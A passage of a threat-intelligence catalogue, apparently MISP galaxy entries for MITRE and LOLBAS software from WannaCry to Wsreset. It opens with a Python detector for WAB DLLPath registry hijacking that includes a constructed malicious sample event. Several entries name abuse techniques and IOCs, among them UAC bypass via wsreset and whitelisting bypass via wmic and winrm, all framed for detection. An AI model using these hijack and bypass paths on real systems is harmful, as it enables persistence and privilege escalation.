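# wab.exe loads the DLL named here (per the Hexacorn post cited above).
# Suffix match so HKLM and per-user HKU/HKCU paths are both covered.
WAB_DLLPATH_SUFFIX = r"\software\microsoft\wab\dllpath"
# Assumed stock value; confirm on your own builds.
DEFAULT_WAB_DLL = r"%commonprogramfiles%\system\wab32.dll"
# Assumed writers allowed to (re)set the stock value: servicing and installers.
TRUSTED_WRITERS = {"msiexec.exe", "tiworker.exe"}


@dataclass(frozen=True)
class RegSetEvent:
    image: str           # process that wrote the value
    target_object: str   # full path of the value, any hive
    details: str         # data written


def check_wab_dllpath(ev):
    """Return a reason string when the event touches WAB DLLPath and the
    write is not a trusted writer restoring the stock DLL, else None."""
    if not ev.target_object.lower().endswith(WAB_DLLPATH_SUFFIX):
        return None
    writer = ntpath.basename(ev.image).lower()
    value = ev.details.strip().strip('"').lower()
    if value == DEFAULT_WAB_DLL and writer in TRUSTED_WRITERS:
        return None
    if value == DEFAULT_WAB_DLL:
        # Someone untrusted put the stock value back: possible cleanup after abuse.
        return writer + " reset WAB DLLPath to the stock value (review, low severity)"
    return writer + " repointed WAB DLLPath to " + ev.details


def scan(events):
    """Return (target_object, reason) for every event that fires."""
    out = []
    for ev in events:
        reason = check_wab_dllpath(ev)
        if reason:
            out.append((ev.target_object, reason))
    return out


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    RegSetEvent(r"C:\Windows\System32\reg.exe",
                r"HKLM\SOFTWARE\Microsoft\WAB\DLLPath",
                r"C:\Users\alice\AppData\Local\Temp\wab32.dll"),
    RegSetEvent(r"C:\Windows\System32\msiexec.exe",
                r"HKLM\SOFTWARE\Microsoft\WAB\DLLPath",
                r"%CommonProgramFiles%\System\wab32.dll"),
    RegSetEvent(r"C:\Windows\regedit.exe",
                r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\WAB\DLLPath",
                r"%CommonProgramFiles%\System\wab32.dll"),
    RegSetEvent(r"C:\Windows\System32\svchost.exe",
                r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
                r"C:\Users\alice\AppData\Local\Temp\wab32.dll"),
]
```

Sysmon only records value writes (Event ID 13), not reads, which is why the Ttdinject entry's "queries made to the IFEO registry key" IOC needs EDR-level registry-read telemetry and is not covered by this check; the follow-up to a DLLPath hit is to pull the file at the new path and the process tree that wrote it.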

WannaCry

WannaCry is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.[LogRhythm WannaCry][US-CERT WannaCry 2017][Washington Post WannaCry 2017][FireEye WannaCry 2017]

Internal MISP references

UUID 6e7d1bcf-a308-4861-8aa5-0f4c6f126b0a which can be used as unique global reference for WannaCry in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0366
source MITRE
tags ['45795633-a32b-4d9e-8620-4044ac056647', '09de661e-60c4-43fb-bfef-df017215d1d8', '5a463cb3-451d-47f7-93e4-1886150697ce', 'c2380542-36f2-4922-9ed2-80ced06645c9', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', 'e809d252-12cc-494d-94f5-954c49eb87ce']
type ['malware']
Related clusters

To see the related clusters, click here.

WarzoneRAT

WarzoneRAT is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.[Check Point Warzone Feb 2020][Uptycs Warzone UAC Bypass November 2020]

Internal MISP references

UUID cfebe868-15cb-4be5-b7ed-38b52f2a0722 which can be used as unique global reference for WarzoneRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0670
source MITRE
tags ['15787198-6c8b-4f79-bf50-258d55072fee']
type ['malware']
Related clusters

To see the related clusters, click here.

WastedLocker

WastedLocker is a ransomware family attributed to Indrik Spider that has been used since at least May 2020. WastedLocker has been used against a broad variety of sectors, including manufacturing, information technology, and media.[Symantec WastedLocker June 2020][NCC Group WastedLocker June 2020][Sentinel Labs WastedLocker July 2020]

Internal MISP references

UUID 0ba6ee8d-2b29-4980-8e55-348ea05f00ad which can be used as unique global reference for WastedLocker in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0612
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

Waterbear

Waterbear is modular malware attributed to BlackTech that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.[Trend Micro Waterbear December 2019]

Internal MISP references

UUID 56872a5b-dc01-455c-85d5-06c577abb030 which can be used as unique global reference for Waterbear in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0579
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

WEBC2

WEBC2 is a family of backdoor malware used by APT1 as early as July 2006. WEBC2 backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. [Mandiant APT1 Appendix][Mandiant APT1]

Internal MISP references

UUID f228af8f-8938-4836-9461-c6ca220ed7c5 which can be used as unique global reference for WEBC2 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0109
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

WellMail

WellMail is a lightweight malware written in Golang used by APT29, similar in design and structure to WellMess.[CISA WellMail July 2020][NCSC APT29 July 2020]

Internal MISP references

UUID b936a1b3-5493-4d6c-9b69-29addeace418 which can be used as unique global reference for WellMail in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0515
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

WellMess

WellMess is a lightweight malware family with variants written in .NET and Golang that has been used by APT29 since at least 2018.[CISA WellMess July 2020][PWC WellMess July 2020][NCSC APT29 July 2020]

Internal MISP references

UUID 20725ec7-ee35-44cf-bed6-91158aa03ce4 which can be used as unique global reference for WellMess in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0514
source MITRE
tags ['8bf128ad-288b-41bc-904f-093f4fdde745', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Wevtutil

Wevtutil is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers, install and uninstall event manifests, run queries, and export, archive, and clear event logs.[Wevtutil Microsoft Documentation]

Internal MISP references

UUID 2bcbcea6-192a-4501-aab1-1edde53875fa which can be used as unique global reference for Wevtutil in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0645
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '5db11c6f-cba4-4865-b993-7a3aafd0f037', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Wfc

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).

Author: Jimmy (@bohops)

Paths: * C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe

Resources: * https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/

Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_wfc.yml * IOC: As a Windows SDK binary, execution on a system may be suspicious[Wfc.exe - LOLBAS Project]

Internal MISP references

UUID dadd1243-6a4a-4ce2-9eea-1c530e7510d9 which can be used as unique global reference for Wfc in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5249
source Tidal Cyber
tags ['be621f15-1788-490f-b8bb-85511a5a8074', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

WhisperGate

WhisperGate is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.[Cybereason WhisperGate February 2022][Unit 42 WhisperGate January 2022][Microsoft WhisperGate January 2022]

Internal MISP references

UUID 791f0afd-c2c4-4e23-8aee-1d14462667f5 which can be used as unique global reference for WhisperGate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0689
source MITRE
tags ['2e621fc5-dea4-4cb9-987e-305845986cd3']
type ['malware']
Related clusters

To see the related clusters, click here.

Wiarp

Wiarp is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Wiarp May 2012]

Internal MISP references

UUID 7b393608-c141-48af-ae3d-3eff13c3e01c which can be used as unique global reference for Wiarp in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0206
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Windows Credential Editor

Windows Credential Editor is a password dumping tool. [Amplia WCE]

Internal MISP references

UUID 7c2c44d7-b307-4e13-b181-52352975a6f5 which can be used as unique global reference for Windows Credential Editor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0005
source MITRE
tags ['1d306cbd-9894-4322-a233-b1576b8e25ba']
type ['tool']
Related clusters

To see the related clusters, click here.

WINDSHIELD

WINDSHIELD is a signature backdoor used by APT32. [FireEye APT32 May 2017]

Internal MISP references

UUID ed50dcf7-e283-451e-95b1-a8485f8dd214 which can be used as unique global reference for WINDSHIELD in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0155
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

WindTail

WindTail is a macOS surveillance implant used by Windshift. WindTail shares code similarities with Hack Back aka KitM OSX.[SANS Windshift August 2018][objective-see windtail1 dec 2018][objective-see windtail2 jan 2019]

Internal MISP references

UUID 3afe711d-ed58-4c94-a9b6-9c847e1e8a2f which can be used as unique global reference for WindTail in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0466
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

WINERACK

WINERACK is a backdoor used by APT37. [FireEye APT37 Feb 2018]

Internal MISP references

UUID 5f994df7-55b0-4383-8ebc-506d4987292a which can be used as unique global reference for WINERACK in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0219
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Winexe

Winexe is a lightweight, open source tool similar to PsExec designed to allow system administrators to execute commands on remote servers. [Winexe Github Sept 2013] Winexe is unique in that it is a GNU/Linux based client. [Überwachung APT28 Forfiles June 2015]

Internal MISP references

UUID 65d5b524-0e84-417d-9884-e2c501abfacd which can be used as unique global reference for Winexe in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0191
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

Wingbird

Wingbird is a backdoor that appears to be a version of commercial software FinFisher. It is reportedly used to attack individual computers instead of networks. It was used by NEODYMIUM in a May 2016 campaign. [Microsoft SIR Vol 21] [Microsoft NEODYMIUM Dec 2016]

Internal MISP references

UUID 3e70078f-407e-4b03-b604-bdc05b372f37 which can be used as unique global reference for Wingbird in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0176
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

winget

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows Package Manager tool

Author: Paul Sanders

Paths: * C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe

Resources: * https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html * https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended

Detection: * IOC: winget.exe spawned with local manifest file * IOC: Sysmon Event ID 1 - Process Creation * Analysis: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html * Sigma: proc_creation_win_winget_local_install_via_manifest.yml[winget.exe - LOLBAS Project]

Internal MISP references

UUID 6c4e7a00-0151-490c-8a41-98981d355725 which can be used as unique global reference for winget in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5174
source Tidal Cyber
tags ['61f778ca-b2f1-4877-b0f5-fd5e87b6ddab', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

WinMM

WinMM is a full-featured, simple backdoor used by Naikon. [Baumgartner Naikon 2015]

Internal MISP references

UUID e10423c2-71a7-4878-96ba-343191136c19 which can be used as unique global reference for WinMM in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0059
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Winnti for Linux

Winnti for Linux is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including Winnti Group. The Windows variant is tracked separately under Winnti for Windows.[Chronicle Winnti for Linux May 2019]

Internal MISP references

UUID e384e711-0796-4cbc-8854-8c3f939faf57 which can be used as unique global reference for Winnti for Linux in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0430
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Winnti for Windows

Winnti for Windows is a modular remote access Trojan (RAT) that has likely been used by multiple groups to carry out intrusions in various regions since at least 2010, including by the group that shares its name, Winnti Group.[Kaspersky Winnti April 2013][Microsoft Winnti Jan 2017][Novetta Winnti April 2015][401 TRG Winnti Umbrella May 2018] The Linux variant is tracked separately under Winnti for Linux.[Chronicle Winnti for Linux May 2019]

Internal MISP references

UUID 245c216e-41c3-4dec-8b23-bfc7c6a46d6e which can be used as unique global reference for Winnti for Windows in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0141
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

WinRAR

According to its website, WinRAR is a "data compression, encryption and archiving tool for Windows", which is designed to process RAR and ZIP files.[WinRAR Website] It is known to be abused by threat actors in order to archive (compress) files prior to their exfiltration from victim environments.[U.S. CISA Play Ransomware December 2023]

Internal MISP references

UUID d9792748-b81a-4d82-a45e-de05c2a23dbf which can be used as unique global reference for WinRAR in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5081
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'c45ce044-b5b9-426a-866c-130e9f2a4427', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '23d0545e-45fa-4f0a-957e-deb923039c80']
type ['tool']
Related clusters

To see the related clusters, click here.

winrm

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Script used to manage Windows Remote Management (WinRM) settings

Author: Oddvar Moe

Paths: * C:\Windows\System32\winrm.vbs * C:\Windows\SysWOW64\winrm.vbs

Resources: * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology * https://www.youtube.com/watch?v=3gz1QmiMhss * https://github.com/enigma0x3/windows-operating-system-archaeology * https://redcanary.com/blog/lateral-movement-winrm-wmi/ * https://twitter.com/bohops/status/994405551751815170 * https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 * https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

Detection: * Sigma: proc_creation_win_winrm_awl_bypass.yml * Sigma: proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml * Sigma: file_event_win_winrm_awl_bypass.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[winrm.vbs - LOLBAS Project]

Internal MISP references

UUID 8807e10c-dc1b-4dab-8f60-c03a85c18873 which can be used as unique global reference for winrm in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5263
source Tidal Cyber
tags ['2eecd309-e75d-4f7b-8f6f-e11213f48b12', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

WinSCP

WinSCP is a file transfer client for Microsoft Windows that supports the SSH File Transfer Protocol (SFTP) as well as SCP and FTP.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 3ded75ea-b253-48cd-94e7-aef53e0d1e31 which can be used as unique global reference for WinSCP in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5046
source Tidal Cyber
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Winword

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft Office binary

Author: Reegun J (OCBC Bank)

Paths: * C:\Program Files\Microsoft Office\root\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office\Office16\winword.exe * C:\Program Files\Microsoft Office\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe * C:\Program Files (x86)\Microsoft Office\Office15\winword.exe * C:\Program Files\Microsoft Office\Office15\winword.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe * C:\Program Files (x86)\Microsoft Office\Office14\winword.exe * C:\Program Files\Microsoft Office\Office14\winword.exe * C:\Program Files (x86)\Microsoft Office\Office12\winword.exe * C:\Program Files\Microsoft Office\Office12\winword.exe

Resources: * https://twitter.com/reegun21/status/1150032506504151040 * https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191

Detection: * Sigma: proc_creation_win_office_arbitrary_cli_download.yml * IOC: Suspicious Office application Internet/network traffic[Winword.exe - LOLBAS Project]

Internal MISP references

UUID 7adaeb79-087f-4d65-8f8f-d4689755b107 which can be used as unique global reference for Winword in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5250
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '228354f0-c709-4a16-a489-c5098ae06c17', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Wiper

Wiper is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. [Dell Wiper]

Internal MISP references

UUID 627e05c2-c02e-433e-9288-c2d78bce156f which can be used as unique global reference for Wiper in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0041
source MITRE
tags ['2e621fc5-dea4-4cb9-987e-305845986cd3']
type ['malware']

Wireshark

Wireshark is a popular open-source network protocol analyzer that captures and decodes packet traffic.

Internal MISP references

UUID 804da3b9-9c3a-4937-aa4a-efddfa5c176e which can be used as unique global reference for Wireshark in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Linux', 'macOS', 'Windows']
software_attack_id S5269
source Tidal Cyber
tags ['dbe18a6a-c8f9-451e-837e-5a7f25dcf913', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cd1b5d44-226e-4405-8985-800492cf2865']
type ['tool']

Wlrmdr

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows Logon Reminder executable

Author: Moshe Kaplan

Paths: * c:\windows\system32\wlrmdr.exe

Resources: * https://twitter.com/0gtweet/status/1493963591745220608 * https://twitter.com/Oddvarmoe/status/927437787242090496 * https://twitter.com/falsneg/status/1461625526640992260 * https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw

Detection: * Sigma: proc_creation_win_lolbin_wlrmdr.yml * IOC: wlrmdr.exe spawning any new processes[Wlrmdr.exe - LOLBAS Project]

Internal MISP references

UUID f3eb99a8-b7b5-4e90-8e99-3f38309402c0 which can be used as unique global reference for Wlrmdr in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5175
source Tidal Cyber
tags ['ebf92004-6e43-434c-8380-3671cf3640a2', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Wmic

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI

Author: Oddvar Moe

Paths: * C:\Windows\System32\wbem\wmic.exe * C:\Windows\SysWOW64\wbem\wmic.exe

Resources: * https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory * https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html * https://twitter.com/subTee/status/986234811944648707

Detection: * Sigma: image_load_wmic_remote_xsl_scripting_dlls.yml * Sigma: proc_creation_win_wmic_xsl_script_processing.yml * Sigma: proc_creation_win_wmic_squiblytwo_bypass.yml * Sigma: proc_creation_win_wmic_eventconsumer_creation.yml * Elastic: defense_evasion_suspicious_wmi_script.toml * Elastic: persistence_via_windows_management_instrumentation_event_subscription.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: xsl_script_execution_with_wmic.yml * Splunk: remote_wmi_command_attempt.yml * Splunk: remote_process_instantiation_via_wmi.yml * Splunk: process_execution_via_wmi.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Wmic retrieving scripts from remote system/Internet location * IOC: DotNet CLR libraries loaded into wmic.exe * IOC: DotNet CLR Usage Log - wmic.exe.log[LOLBAS Wmic]

Internal MISP references

UUID 24f3b066-a533-4b6c-a590-313a67154ba0 which can be used as unique global reference for Wmic in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5176
source Tidal Cyber
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '9988b5fd-6235-4a8e-bb8e-d9124ead11d4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Woody RAT

Woody RAT is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.[MalwareBytes WoodyRAT Aug 2022]

Internal MISP references

UUID 1f374a54-c839-5139-b755-555c66a21c12 which can be used as unique global reference for Woody RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1065
source MITRE
type ['malware']

WorkFolders

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Work Folders

Author: Elliot Killick

Paths: * C:\Windows\System32\WorkFolders.exe

Resources: * https://www.ctus.io/2021/04/12/exploading/ * https://twitter.com/ElliotKillick/status/1449812843772227588

Detection: * Sigma: proc_creation_win_susp_workfolders.yml * IOC: WorkFolders.exe should not be run on a normal workstation[WorkFolders.exe - LOLBAS Project]

Internal MISP references

UUID 7720f60a-5c03-4241-b635-6313eceb3307 which can be used as unique global reference for WorkFolders in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5177
source Tidal Cyber
tags ['b5581207-a45f-4f7f-b637-14444d716ad1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Wscript

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by Windows to execute scripts

Author: Oddvar Moe

Paths: * C:\Windows\System32\wscript.exe * C:\Windows\SysWOW64\wscript.exe

Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

Detection: * Sigma: proc_creation_win_wscript_cscript_script_exec.yml * Sigma: file_event_win_net_cli_artefact.yml * Sigma: image_load_susp_script_dotnet_clr_dll_load.yml * Elastic: defense_evasion_unusual_dir_ads.toml * Elastic: command_and_control_remote_file_copy_scripts.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: wscript_or_cscript_suspicious_child_process.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Wscript.exe executing code from alternate data streams * IOC: DotNet CLR libraries loaded into wscript.exe * IOC: DotNet CLR Usage Log - wscript.exe.log[Wscript.exe - LOLBAS Project]

Internal MISP references

UUID be8d1032-3452-4d44-83cb-c7ece7d5a052 which can be used as unique global reference for Wscript in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5178
source Tidal Cyber
tags ['b4520b56-73e3-43fd-9f0d-70191132b451', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Wsl

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows Subsystem for Linux executable

Author: Matthew Brown

Paths: * C:\Windows\System32\wsl.exe

Resources: * https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * https://twitter.com/nas_bench/status/1535431474429808642

Detection: * Sigma: proc_creation_win_wsl_lolbin_execution.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Child process from wsl.exe[Wsl.exe - LOLBAS Project]

Internal MISP references

UUID 9663965e-0fd1-45c3-a138-c7539ed91832 which can be used as unique global reference for Wsl in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5251
source Tidal Cyber
tags ['96ebb518-7c1f-4011-a3ec-42aa78a95e4f', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Wsreset

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used to reset Windows Store settings according to its manifest file

Author: Oddvar Moe

Paths: * C:\Windows\System32\wsreset.exe

Resources: * https://www.activecyber.us/activelabs/windows-uac-bypass * https://twitter.com/ihack4falafel/status/1106644790114947073 * https://github.com/hfiref0x/UACME/blob/master/README.md

Detection: * Sigma: proc_creation_win_uac_bypass_wsreset_integrity_level.yml * Sigma: proc_creation_win_uac_bypass_wsreset.yml * Sigma: registry_event_bypass_via_wsreset.yml * Splunk: wsreset_uac_bypass.yml * IOC: wsreset.exe launching child process other than mmc.exe * IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command * IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen[Wsreset.exe - LOLBAS Project]

Internal MISP references

UUID b75e4dcf-62ed-44cc-b9d2-d6d1b90955a8 which can be used as unique global reference for Wsreset in MISP communities and other software using the MISP galaxy

